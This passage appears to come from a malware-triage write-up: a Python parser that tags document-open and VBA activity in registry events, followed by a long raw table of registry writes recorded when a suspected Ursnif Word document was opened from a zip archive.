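DOC_EXT = (".doc", ".docm", ".dot", ".dotm", ".rtf", ".xls", ".xlsm")

def _is_record_start(lines, i):
    """A record begins with <digits>, <name>.exe, <operation> on three lines."""
    return (i + 2 < len(lines) and lines[i].isdigit()
            and lines[i + 1].lower().endswith(".exe")
            and lines[i + 2] in OPERATIONS)

def parse_registry_events(text):
    """Return a list of {pid, process, op, key, name, value} dicts."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    starts = [i for i in range(len(lines)) if _is_record_start(lines, i)]
    events = []
    for n, i in enumerate(starts):
        end = starts[n + 1] if n + 1 < len(starts) else len(lines)
        rec = lines[i:end]
        if len(rec) < 4:            # truncated export: no key line
            continue
        pid, proc, op, key, *rest = rec
        # One trailing line is ambiguous (a value name with no data, or an
        # unnamed default value); two lines are name then value.
        events.append({"pid": int(pid), "process": proc, "op": op, "key": key,
                       "name": rest[0] if rest else None,
                       "value": rest[1] if len(rest) > 1 else None})
    return events

def paths_in_blob(hex_value):
    """Decode UTF-16LE paths from a hex-encoded binary value (Resiliency blobs)."""
    try:
        raw = bytes.fromhex(hex_value)
    except ValueError:          # not hex: a plain string value
        return []
    return [m.group().decode("utf-16-le") for m in UTF16_PATH_RE.finditer(raw)]

def findings(events):
    """(tag, detail) pairs for events that reveal document and VBA activity."""
    out = []
    for e in events:
        key = e["key"].lower()
        payload = e["value"] or e["name"] or ""
        if "\\office\\" in key and key.endswith("\\file mru") \
                and payload.lower().endswith(DOC_EXT):
            out.append(("document-opened", payload.split("*", 1)[-1]))
        elif "\\installer\\userdata\\" in key and e["name"] == "VBAFiles":
            out.append(("vba-used", e["key"]))           # VBA feature usage counter
        elif "\\typelib\\" in key and "\\temp\\vbe\\" in payload.lower():
            out.append(("vba-typelib-cached", payload))  # .exd cache from a VBA project
        elif key.endswith("\\resiliency\\startupitems") and e["op"] == "write":
            out.extend(("resiliency-path", p) for p in paths_in_blob(payload))
    return out

# Constructed sample: header plus seven rows copied from the report's table.
SAMPLE = "\n".join([
    "PID", "Process", "Operation", "Key", "Name", "Value",
    "2940", "WinRAR.exe", "write",
    r"HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes", "ShellExtBMP",
    "2940", "WinRAR.exe", "write",
    r"HKEY_CURRENT_USER\Software\WinRAR\ArcHistory", "0", r"C:\Users\admin\Desktop\SPAM2.zip",
    "2904", "WINWORD.EXE", "delete key",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems",
    "2904", "WINWORD.EXE", "write",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage",
    "VBAFiles", "1324482564",
    "2904", "WINWORD.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU", "Item 1",
    r"[F00000000][T01D53D78132D3F80][O00000000]*C:\Users\admin\Desktop\Ursnif_Usa.doc",
    "2904", "WINWORD.EXE", "write",
    r"HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\0\win32",
    r"C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd",
    "2904", "WINWORD.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems", ")h:",
    "29683A00580B000006000000010000005C000000020000004C0000000400000063003A005C00750073006500720073005C00"
    "610064006D0069006E005C006400650073006B0074006F0070005C007500720073006E00690066005F00"
    "7500730061002E0064006F006300000000000000",
])

if __name__ == "__main__":
    for tag, detail in findings(parse_registry_events(SAMPLE)):
        print(f"{tag:20} {detail}")
```

The Resiliency blobs are worth decoding because they record the full path of every document Word had open, including the template, even when the MRU entry has been cleared; the `(tag, detail)` output is deliberately flat so it can be joined against the process tree by PID.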

Modification events

PID
Process
Operation
Key
Name
Value
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2940
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\SPAM2.zip
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\Desktop
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_0
4C000000730100000402000000000000D4D0C800000000000000000000000000000000000000000042010E00000000000000000039000000B402000000000000000000000000000001000000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_1
4C000000730100000500000000000000D4D0C8000000000000000000000000000000000000000000A4010B000000000000000000160000002A00000000000000000000000000000002000000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_2
4C000000730100000400000000000000D4D0C800000000000000000000000000000000000000000058010A000000000000000000160000006400000000000000000000000000000003000000
2904
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(c:
28633A00580B0000010000000000000000000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
1324482603
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482686
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482687
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
580B00003A4FD811783DD50100000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
cf:
63663A00580B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
)h:
29683A00580B000006000000010000005C000000020000004C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C007500720073006E00690066005F007500730061002E0064006F006300000000000000
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
1324482564
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{832EE45C-7B3A-4C8F-8A99-3D3A2C23C0D0}
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D53D78132ACE80][O00000000]*C:\Users\admin\Desktop\
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D53D78132D3F80][O00000000]*C:\Users\admin\Desktop\Ursnif_Usa.doc
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\EDA9D
EDA9D
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0
Microsoft Forms 2.0 Object Library
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\FLAGS
6
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
2904
WINWORD.EXE
write
Key | Value | PID | Process | Operation
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLImage | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLReset | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLReset | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLCheckbox | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLCheckbox | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLOption | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLOption | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLText | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLText | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLHidden | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLHidden | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLPassword | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLPassword | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLSelect | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLSelect | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLTextArea | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} | IWHTMLTextArea | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | LabelControlEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | LabelControlEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} | CommandButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} | CommandButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | MdcTextEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | MdcTextEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | MdcListEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | MdcListEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | MdcComboEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | MdcComboEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} | MdcCheckBoxEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} | MdcCheckBoxEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | MdcOptionButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | MdcOptionButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | MdcToggleButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | MdcToggleButtonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | ScrollbarEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | ScrollbarEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | TabStripEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | TabStripEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | SpinbuttonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | SpinbuttonEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | ImageEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | ImageEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | WHTMLControlEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | WHTMLControlEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents1 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents1 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents2 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents2 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents3 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents3 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents4 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents4 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents5 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents5 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents6 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents6 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents7 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents7 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents9 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents9 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents10 | 2904 | WINWORD.EXE | write
